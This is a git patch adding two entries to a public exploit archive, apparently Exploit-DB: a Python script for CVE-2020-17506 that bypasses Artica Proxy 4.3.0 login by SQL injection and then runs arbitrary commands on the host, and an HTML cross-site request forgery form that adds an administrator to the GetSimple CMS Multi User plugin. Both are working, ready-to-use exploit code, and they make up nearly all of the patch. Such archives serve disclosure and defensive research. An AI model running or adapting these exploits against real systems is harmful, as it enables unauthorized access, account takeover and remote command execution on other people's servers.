From e3b25a25ca8957e1451cb9e93a3be1b25fa167e9 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 14 Aug 2020 05:01:50 +0000
Subject: [PATCH] DB: 2020-08-14

2 changes to exploits/shellcodes

Artica Proxy 4.3.0 - Authentication Bypass
GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)
---
 exploits/hardware/webapps/48744.py | 52 ++++++++++++++++++++++++++++++
 exploits/php/webapps/48745.txt     | 33 +++++++++++++++++++
 files_exploits.csv                 |  2 ++
 3 files changed, 87 insertions(+)
 create mode 100755 exploits/hardware/webapps/48744.py
 create mode 100644 exploits/php/webapps/48745.txt
diff --git a/exploits/hardware/webapps/48744.py b/exploits/hardware/webapps/48744.py
new file mode 100755
index 000000000..8fe382a18
--- /dev/null
+++ b/exploits/hardware/webapps/48744.py
@@ -0,0 +1,52 @@
+# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-08-13
+# Exploit Author: Dan Duffy
+# Vendor Homepage: http://articatech.net/
+# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
+# Version: 4.30.00000000 (REQUIRED)
+# Tested on: Debian
+# CVE : CVE-2020-17506
+
+import requests
+import argparse
+from bs4 import BeautifulSoup
+
+
+def bypass_auth(session, args):
+    login_endpoint = "/fw.login.php?apikey="
+    payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
+
+    print("[+] Bypassing authentication...")
+    session.get(args.host + login_endpoint + payload, verify=False)
+
+    return session
+
+
+def run_command(session, args):
+    cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)
+    print("[+] Running command: {}".format(args.command))
+    response = session.post(args.host + cmd_endpoint, verify=False)
+    soup = BeautifulSoup(response.text, "html.parser")
+    print(soup.find_all("code")[1].get_text())
+
+
+def main():
+    parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
+    parser.add_argument(
+        "--host", help="The host to target. Format example: https://host:port",
+    )
+    parser.add_argument("--command", help="The command to run")
+
+    args = parser.parse_args()
+    if not args.host or not args.command:
+        parser.print_help()
+        exit(0)
+    session = requests.Session()
+    session = bypass_auth(session, args)
+
+    run_command(session, args)
+
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/48745.txt b/exploits/php/webapps/48745.txt
new file mode 100644
index 000000000..c42e67a8d
--- /dev/null
+++ b/exploits/php/webapps/48745.txt
@@ -0,0 +1,33 @@
+# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin)
+# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
+# Date: August 2020-08-12
+# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/
+# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip
+# Version: 1.8.2
+# Tested On: Windows 10 Pro + XAMPP
+# CWE-352: Cross-Site Request Forgery (CSRF)
+# Vulnerability Description:
+#   Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via authenticated admin visiting a third-party site.
+
+## Usage: 
++ Change <IP||DOMAIN> to target IP address or domain name
++ Change <ADMIN> to target username
++ Change <PASSWORD> to target password
+
+## CSRF POST Form Method
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST">
+      <input type="hidden" name="usernamec" value="<ADMIN>" />
+      <input type="hidden" name="useremail" value="ADMIN&#64;DOMAIN&#46;LOCAL" />
+      <input type="hidden" name="ntimezone" value="" />
+      <input type="hidden" name="userlng" value="en&#95;US" />
+      <input type="hidden" name="userpassword" value="<PASSWORD>" />
+      <input type="hidden" name="usereditor" value="1" />
+      <input type="hidden" name="Landing" value="" />
+      <input type="hidden" name="add&#45;user" value="Add&#32;New&#32;User" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f3274508b..fa752befb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42985,3 +42985,5 @@ id,file,description,date,author,type,platform,port
 48741,exploits/php/webapps/48741.txt,"Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)",2020-08-11,"Roel van Beurden",webapps,php,
 48742,exploits/php/webapps/48742.txt,"CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload",2020-08-12,"Roel van Beurden",webapps,php,
 48743,exploits/php/webapps/48743.txt,"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution",2020-08-12,zenofex,webapps,php,
+48744,exploits/hardware/webapps/48744.py,"Artica Proxy 4.3.0 - Authentication Bypass",2020-08-13,"Dan Duffy",webapps,hardware,
+48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,
